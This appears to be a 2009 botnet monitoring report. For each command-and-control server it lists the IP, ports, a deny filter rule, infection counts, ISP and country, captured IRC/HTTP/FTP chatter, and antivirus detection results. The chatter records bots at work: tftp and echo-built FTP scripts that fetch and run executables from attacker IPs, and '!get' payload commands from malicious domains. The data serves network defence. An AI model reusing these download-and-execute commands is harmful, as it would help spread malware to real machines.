  • Server: :eat.a.dick NOTICE USA|2K|SP2|00|2905 :*** If you are having...
  • Server: PONG :7B586E46
  • Client: JOIN ##!X5 whores
  • Client: USERHOST USA|2K|SP2|00|2905MODE USA|2K|SP2|00|2905 -x+iJOIN ##!X5...
  • Server: PONG :eat.a.dick
  • Client: JOIN ##!X5 whores
  • Server: PONG :eat.a.dick
  • Client: JOIN ##!X5 whores
  • Server: PONG :eat.a.dick
  • Client: JOIN ##!X5 whores

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 13 TCP Ports 80 Filter deny ip host 82.98.86.170 any log ! 13 infects 06/11/09 to 10/31/09 fhe3rz.net ISP sedo domain parking
Clients 13 germany Activity Domain fhe3rz.net
Chatter Example
  • Client: GET /xxxxxxx HTTP/1.0User-Agent: bHost: 203.180.17.238
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET...
  • Server: GET /css/724/landing/en.css HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/body_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/td_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/container_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/keywords_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/bullet.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/pop_cat_top.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/searchtext_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/search.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/footer_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Korgo.46592
AntiVirPadobot.Z.2
AuthentiumBerbew.M
Avast_Padobot-I
AVGGeneric7.ORM
BitDefenderGeneric.208542
CAT-QuickHealI-Padobot.z
ClamAVKorgo.Z
DrWebHangUp.26
eSafeMISSED
eTrust-VetBerkor.A
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtBerbew.M
F-SecurePadobot.z
IkarusPadobot.Z
KasperskyPadobot.z
McAfeeMISSED
MicrosoftBerbew.BE!dam
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingBerbew.d
SophosDoxpar-C
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroBKDR_BERBEW.Q
VBA32Padobot.z
VirusBusterPadobot.B
Webwasher
Gateway
MISSED
Priority 11 TCP Ports 8080 8080 67 Filter deny ip host 72.10.172.211 any log ! 11 infects 06/20/09 to 10/16/09 gtcomm.net ISP globotech communications
Clients 11 canada Activity Domain gtcomm.net
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 24.103.196.250 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 24.103.196.250 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER jseabq jseabq jseabq :dqhawgsvzjhxsrsm
  • Client: NICK ErEDHMyl
  • Client: MODE ErEDHMyl +xi
  • Client: GET /rs3.exe HTTP/1.0Host: idfc.info
  • Server: GET /f.exe HTTP/1.0Host: idfc.info
  • Client: JOIN #las6 USERHOST ErEDHMylMODE #m +smntuPRIVMSG #m...
  • Client: MODE #las6 +smntu
  • Server: :hub.20582.com 482 ErEDHMyl #las6 :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut
AntiVirVirut.AT
AuthentiumVirut.AG
Avast_Virtob
AVGRBot.KB
BitDefenderIRC-Generic.3619
CAT-QuickHealVirut.Y
ClamAVSmall-4287
DrWebIRC.Sdbot.2665
eSafeTRCrypt.nspm
eTrust-VetVirut.6640
EwidoMISSED
FileAdvisorMISSED
FortinetNepoe.EM!tr.bdr
F-ProtVirut.AG
F-SecureNepoe.em
IkarusMISSED
KasperskyNepoe.em
McAfeeVirut.gen.a
MicrosoftVirut.AA
NOD32v2MISSED
NormanVirut.AH
PandaVirutas.AH
Prevx1MISSED
RisingVirut.al
SophosVirut-Gen
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.genS
TrendMicroPE_VIRUT.AT
VBA32Nepoe.em
VirusBusterPoeBot.OB
Webwasher
Gateway
MISSED
Priority 10 TCP Ports 65520 65520 91 Filter deny ip host 91.121.221.157 any log ! 10 infects 08/22/09 to 09/05/09 - ISP fr-ovh
Clients 10 france Activity Domain -
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 114.203.72.50 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 114.203.72.50 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK lejfnledUSER e020500 . . :_
  • Client: Service Pack 2JOIN &virtu
  • Server: :l. PRIVMSG lejfnled :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusHostil
KasperskyMISSED
McAfeeMISSED
MicrosoftHostil.F
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalEncPk-IF
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 10 TCP Ports 5190 67 6556 5190 72 Filter deny ip host 83.68.16.6 any log ! 10 infects 06/17/09 to 09/19/09 xs4all.nl ISP xs4all internet bv
Clients 10 netherlands Activity Domain xs4all.nl
Chatter Example
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
  • Client: NICK znbXghHO
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Client: MODE znbXghHO +xi
  • Client: JOIN #las6 USERHOST znbXghHO
  • Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
  • Client: MODE #las6 +smntu
  • Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Server: NICK znbXghHO
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxlyNICK znbXghHO
  • Client: MODE znbXghHO +xi
  • Client: JOIN #las6 USERHOST znbXghHO
  • Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
  • Client: MODE #las6 +smntu
  • Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Nepoe.58880
AntiVirTRCrypt.XPACK.Gen
AuthentiumNepoe.A
AvastMISSED
AVGSHeur2.AIJS
BitDefenderIRC-Generic.5049
CAT-QuickHealNepoe.hm
ClamAVMISSED
DrWebPacked.162
eSafeTRCrypt.XPACK
eTrust-VetLinkbot.VJ
EwidoMISSED
FileAdvisorMISSED
FortinetNepoe.YW!tr
F-ProtNepoe.A
F-SecureNepoe.hm
IkarusPacker.Krunchy.B
KasperskyNepoe.hm
McAfeeMISSED
MicrosoftPoebot
NOD32v2MISSED
NormanSmalltroj.dam
PandaBckNepoe.F
Prevx1MISSED
RisingUndef.dnb
SophosMalGeneric-A
SunbeltMISSED
SymantecIRCBot
TheHackerMISSED
TrendMicroBKDR_NEPOE.CW
VBA32Nepoe.hm
VirusBusterNepoe.DL
Webwasher
Gateway
MISSED
Priority 10 TCP Ports 6556 194 Filter deny ip host 194.109.11.65 any log ! 10 infects 06/21/09 to 10/04/09 xs4all.net ISP xs4all ppp _30 router subnets
Clients 10 netherlands Activity Domain xs4all.net
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 67.10.66.79 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 67.10.66.79 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER ylxs ylxs ylxs :xLegion/0x029NICK ylxs
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Client: JOIN #29# g3t0u7
  • Server: :ylxs!ylxs@192.168.1.179 JOIN :#29# g3t0u7
  • Server: :mindleak.com MODE #29# g3t0u7 +nt:mindleak.com 353 ylxs = #29#...
  • Client: USER kegkqj kegkqj kegkqj :xLegion/0x029NICK kegkqj
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.19968.B
AntiVirSdBot.19968
AuthentiumSdbot.MIU
Avast_Agent-IDE
AVGAgent.10.BA
BitDefenderGeneric.Sdbot.99B2E6B1
CAT-QuickHealSdBot.afu
ClamAVCodbot-22
DrWebDetox.based
eSafeSdBot.afu
eTrust-VetToxbot!generic
EwidoAgent.ri
FileAdvisorMISSED
FortinetDcomRpc.AFU!tr.bdr
F-ProtSdbot.MIU
F-SecureHorst.gen33
IkarusAgent.ri
KasperskyAgent.ri
McAfeeSdbot.gen
MicrosoftCodbot.BU
NOD32v2Codbot
NormanSDBot.SML
PandaCodbot.BS.worm
Prevx1MISSED
RisingCodbot.cr
SophosCodbot-AB
SunbeltMISSED
SymantecIRCbot
TheHackerBackdoorSdBot.afu
TrendMicroMISSED
VBA32SdBot.afu
VirusBusterRbot.Gen.15
Webwasher
Gateway
SdBot.19968
Priority 8 TCP Ports 3305 Filter deny ip host 200.49.145.197 any log ! 8 infects 09/04/09 to 11/02/09 allytech.com ISP allytech s.a
Clients 8 argentina Activity Domain allytech.com
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 173.16.120.174 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 173.16.120.174 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|a6xnr2frjUSER a5fik9m7o * 0 :USA|2K|445
  • Server: :hub.49011.net 001 P|a6xnr2frj...
  • Client: USERHOST P|a6xnr2frj
  • Server: :hub.49011.net 302 P|a6xnr2frj...
  • Client: USERHOST P|a6xnr2frjMODE P|a6xnr2frj JOIN #mm RSA

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.Gen
AntiVirTRATRAPS.Gen
AuthentiumMISSED
Avast_DCom-F
AVGSHeur2.BBMT
BitDefenderGeneric.Mydoom.638E6D7B
CAT-QuickHealI-Kolabc.gza
ClamAVMISSED
DrWebHLLW.Piabot.4
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetKolabc.GZA!im
F-ProtMISSED
F-SecureKolabc.gza
IkarusKolabc
KasperskyKolabc.gza
McAfeeMISSED
MicrosoftKolabc.C
NOD32v2MISSED
NormanAkbot.BJT
PandaGaobot.OXI.worm
Prevx1MISSED
RisingDropper.Undef.GEN
SophosMalBehav-104
SunbeltGeneric!BT
SymantecSpybot.Worm
TheHackerMISSED
TrendMicroKOLABC.GB
VBA32Kolabc.gza
VirusBusterRBot.Gen.3
Webwasher
Gateway
MISSED
Priority 8 TCP Ports 65520 91 Filter deny ip host 91.212.220.156 any log ! 8 infects 08/23/09 to 09/07/09 - ISP group vertical ltd
Clients 8 russian federation Activity Domain -
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
  • Client: NICK dtugkmbeUSER i020501 . . :-
  • Client: JOIN &virtu
  • Server: :k. PRIVMSG dtugkmbe :!get http:/gidromash.cn/oc/box.txt
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: NICK jddwnomeUSER n020501 . . :-
  • Client: JOIN &virtu
  • Server: :l. PRIVMSG jddwnome :!get http:/gidromash.cn/oc/box.txt
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumKorgo.V
Avast_Virtob
AVGKorgo.A
BitDefenderPadobot.BV.Dam
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebLsabot
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtKorgo.V
F-SecureMISSED
IkarusPadobot.M
KasperskyPadobot.m
McAfeeVirut.gen.a
MicrosoftKorgo.V
NOD32v2MISSED
NormanKorgo.V
PandaVirutas.FG
Prevx1MISSED
RisingVirut.an
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterPadobot.D
Webwasher
Gateway
MISSED
Priority 7 TCP Ports 3305 Filter deny ip host 211.233.45.253 any log ! 7 infects 09/01/09 to 09/08/09 kidc.net ISP korea internet data center inc
Clients 7 korea_ republic of Activity Domain kidc.net
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 96.8.226.33 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 96.8.226.33 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|tyz4nprpcUSER v7sfuv623 * 0 :USA|XP|126
  • Server: :hub.49523.net 001 P|tyz4nprpc...
  • Client: USERHOST P|tyz4nprpc
  • Server: :hub.49523.net 302 P|tyz4nprpc...
  • Client: USERHOST P|tyz4nprpcMODE P|tyz4nprpc JOIN #mm RSA

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDropper.Gen
AuthentiumThreat-HLLIYE!Eldorado
Avast_DCom-F
AVGHeur
BitDefenderPacker.Yoda.A
CAT-QuickHealMISSED
ClamAVMISSED
DrWebHLLW.Piabot.4
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtThreat-HLLIYE!Eldorado
F-SecureMISSED
IkarusExploit.MS06040
KasperskyHeur.Generic
McAfeeMISSED
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanMISSED
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalPacker
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroPAK_Generic.001
VBA32MISSED
VirusBusterPackedYoda
Webwasher
Gateway
MISSED
Priority 5 TCP Ports 3305 Filter deny ip host 203.146.251.62 any log ! 5 infects 06/11/09 to 11/03/09 csloxinfo.net ISP reassign to paidc idc suapha-idc customer
Clients 5 thailand Activity Domain csloxinfo.net
Chatter Example
  • Client: PASS secretpass
  • Client: NICK P|ot4z09bbzUSER lnv4ddgy3 * 0 :USA|XP|651
  • Server: :hub.62014.net 001 P|ot4z09bbz...
  • Client: USERHOST P|ot4z09bbz
  • Server: :hub.62014.net 302 P|ot4z09bbz...
  • Client: USERHOST P|ot4z09bbzMODE P|ot4z09bbz JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDropper.Gen
AuthentiumThreat-HLLIYE!Eldorado
Avast_DCom-F
AVGHeur
BitDefenderPacker.Yoda.A
CAT-QuickHealMISSED
ClamAVMISSED
DrWebHLLW.Piabot.4
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtThreat-HLLIYE!Eldorado
F-SecureMISSED
IkarusExploit.MS06040
KasperskyHeur.Generic
McAfeeMISSED
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanMISSED
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalPacker
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroPAK_Generic.001
VBA32MISSED
VirusBusterPackedYoda
Webwasher
Gateway
MISSED
Priority 4 TCP Ports 65520 65520 216 Filter deny ip host 218.93.205.23 any log ! 4 infects 08/19/09 to 08/20/09 163data.com.cn ISP chinanet jiangsu province network
Clients 4 china Activity Domain 163data.com.cn
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 85.132.5.169:1737
  • Client: NICK hxpxonzsUSER c020501 . . :-
  • Client: JOIN &virtu
  • Server: :i. PRIVMSG hxpxonzs :!get http:/dretis.cn/oc/box.txt

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumKorgo.W
Avast_Virtob
AVGKorgo.D
BitDefenderGeneric.1674959
CAT-QuickHealVirut.Z
ClamAVMISSED
DrWebLsabot
eSafeVirut.n
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtKorgo.W
F-SecureVirut.av
IkarusKorgo.K
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftKorgo.AB
NOD32v2MISSED
NormanKorgo.Y
PandaVirutas.FG
Prevx1MISSED
RisingJunk.Virut.a
SophosVirut-W
SunbeltGeneric!BT
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterKorgo.AB
Webwasher
Gateway
MISSED
Priority 3 TCP Ports 6668 6667 Filter deny ip host 91.121.83.177 any log ! 3 infects 08/22/09 to 08/22/09 gergosnet.com ISP ovh sas
Clients 3 france Activity Domain gergosnet.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR mode.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK gyreobciUSER cwbkcdugs 0 0 :gyreobci
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your...
  • Client: USERHOST gyreobci
  • Client: MODE gyreobci +xiJOIN ##Stab## qifort1USERHOST gyreobciMODE...
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 65520 216 Filter deny ip host 221.5.74.40 any log ! 2 infects 08/18/09 to 08/18/09 cncnet.net ISP china unicom guangdong province network
Clients 2 china Activity Domain cncnet.net
Chatter Example
  • Client: NICK tztznbvfUSER f020501 . . :-
  • Server: NICK tztznbvfUSER f020501 . . :-JOIN &virtu
  • Server: :j. PRIVMSG tztznbvf :!get http:/dretis.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /bt5/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /lib/bot.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /lib/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /ag/lo.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /dll/mal.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusTrojan-Downloader.Obitel
KasperskyMISSED
McAfeeMISSED
MicrosoftTrojanDownloader_Obitel.gen!C
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 13001 12351 Filter deny ip host 122.160.232.194 any log ! 2 infects 09/13/09 to 10/30/09 122.airtelbroadband.in ISP abts-dsl-del
Clients 2 india Activity Domain 122.airtelbroadband.in
Chatter Example
  • Client: echo open 85.179.166.148 17323>.pif C:\\WINDOWS\\system32>
  • Client: echo user a a>>.pif C:\\WINDOWS\\system32>
  • Client: echo binary>>.pif C:\\WINDOWS\\system32>
  • Client: echo GET iexplorer.exe>>.pif C:\\WINDOWS\\system32>
  • Client: echo bye>>.pif C:\\WINDOWS\\system32>
  • Client: echo @echo off >c.batC:\\WINDOWS\\system32>
  • Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>
  • Client: echo iexplorer.exe >>c.batC:\\WINDOWS\\system32>
  • Client: echo del .pif >>c.batC:\\WINDOWS\\system32>
  • Client: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
  • Client: echo exit /y >>c.batC:\\WINDOWS\\system32>
  • Client: USER a
  • Client: PASS a
  • Server: RETR iexplorer.exe
  • Client: NICK `tkhjqhirUSER `tkhjqhir 0 0 :`tkhjqhir
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
  • Client: JOIN #.has hs
  • Client: USERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has...
  • Server: :`tkhjqhir!~tkhjqhir@183C7886.415835BD.ED5D58B5.IP JOIN...
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRSpy.Games.A
AuthentiumSTZ_like!Generic
AvastMISSED
AVGPolyCrypt
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtSTZ_like!Generic
F-SecureSuspicious_Malware!Gemini
IkarusVirut.n
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Spy.Games.A
Priority 2 TCP Ports 2345 Filter deny ip host 82.114.87.50 any log ! 2 infects 08/04/09 to 08/11/09 atk-ks.org ISP yu-kujtesa
Clients 2 serbia and montenegro Activity Domain atk-ks.org
Chatter Example
  • Client: GET /mumie.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Client: NICK NT50|32580900USER NT50|32580900 0 0 :NT50|32580900
  • Server: :irc.oc256.com NOTICE AUTH :*** Looking up your hostname...
  • Server: :irc.oc256.com NOTICE AUTH :*** Couldn\\'t resolve your hostname;...
  • Server: :irc.oc256.com NOTICE NT50|32580900 :*** If you are having...
  • Server: PONG :A18EEE60
  • Client: JOIN #!MUM! Mixxx74
  • Server: :NT50|32580900 MODE NT50|32580900 :+i
  • Client: USERHOST NT50|32580900MODE NT50|32580900 +n+BJOIN #!MUM!...
  • Server: :irc.oc256.com 501 NT50|32580900 :Unknown MODE flag
  • Server: PONG :irc.oc256.com
  • Server: PONG :irc.oc256.com

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 3305 Filter deny ip host 210.166.223.51 any log ! 2 infects 07/12/09 to 08/03/09 hitachi-system.co.jp ISP prox-communicator(prox system design inc.)
Clients 2 japan Activity Domain hitachi-system.co.jp
Chatter Example
  • Client: PASS secretpass
  • Client: NICK P|jsmmnebfrUSER jy08fve9z * 0 :USA|XP|155
  • Server: :hub.4668.net 001 P|jsmmnebfr...
  • Client: USERHOST P|jsmmnebfr
  • Client: USERHOST P|jsmmnebfrMODE P|jsmmnebfr JOIN #mm RSA
  • Server: :hub.4668.net 302 P|jsmmnebfr...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Kolabc.141454.K
AntiVirTRDropper.Gen
AuthentiumThreat-HLLIYE!Eldorado
Avast_DCom-F
AVGHeur
BitDefenderPacker.Yoda.A
CAT-QuickHealI-Kolabc.gmv
ClamAVMISSED
DrWebHLLW.Piabot.3
eSafeTRDropper
eTrust-VetSdbot.NJ
EwidoMISSED
FileAdvisorMISSED
FortinetPossibleThreat
F-ProtThreat-HLLIYE!Eldorado
F-SecureKolabc.gmv
IkarusKolabc
KasperskyKolabc.gmv
McAfeeGeneric.dx!bz
MicrosoftKolabc.C
NOD32v2MISSED
NormanSmalltroj.NVNC
PandaGaobot.OXI.worm
Prevx1MISSED
RisingMS06-040.f
SophosMalPacker
SunbeltMISSED
SymantecSpybot.Worm
TheHackerKolabc.gmv
TrendMicroTROJ_LSADCOM.MCL
VBA32Kolabc.gmv
VirusBusterRbot.AKMS
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 3305 Filter deny ip host 217.18.77.190 any log ! 2 infects 08/03/09 to 08/03/09 axoft.nl ISP qweb
Clients 2 netherlands Activity Domain axoft.nl
Chatter Example
  • Server: echo open 130.13.164.110 40102 >> asr_plmye &echo user plmyen...
  • Client: USER plmyen
  • Client: PASS plmyen
  • Client: open 130.13.164.110 40102 220user plmyen plmyen 331
  • Server: RETR asr_68418.exe
  • Server: echo open 130.13.164.110 40102 >> asr_fscuf &echo user fscufu...
  • Client: USER fscufu
  • Client: PASS fscufu
  • Client: PASS secretpass
  • Client: NICK P|b83hbs1b6USER mg28508k3 * 0 :USA|2K|053
  • Server: :hub.11433.net 001 P|b83hbs1b6...
  • Client: USERHOST P|b83hbs1b6
  • Client: USERHOST P|b83hbs1b6MODE P|b83hbs1b6 JOIN #mm RSA
  • Server: :hub.11433.net 302 P|b83hbs1b6...
  • Server: PING :hub.11433.net
  • Server: PONG hub.11433.net
  • Server: PING :hub.11433.net
  • Server: PONG hub.11433.net

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.Gen
AntiVirTRATRAPS.Gen
AuthentiumMISSED
Avast_DCom-F
AVGSHeur2.AOLW
BitDefenderGeneric.Mydoom.F72197F1
CAT-QuickHealAgent.gen
ClamAVMISSED
DrWebHLLW.Piabot.origin
eSafeMISSED
eTrust-VetIRCBot.PJ
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureKolabc.gza
IkarusExploit.MS06040
KasperskyKolabc.gza
McAfeeSpybot.worm!l
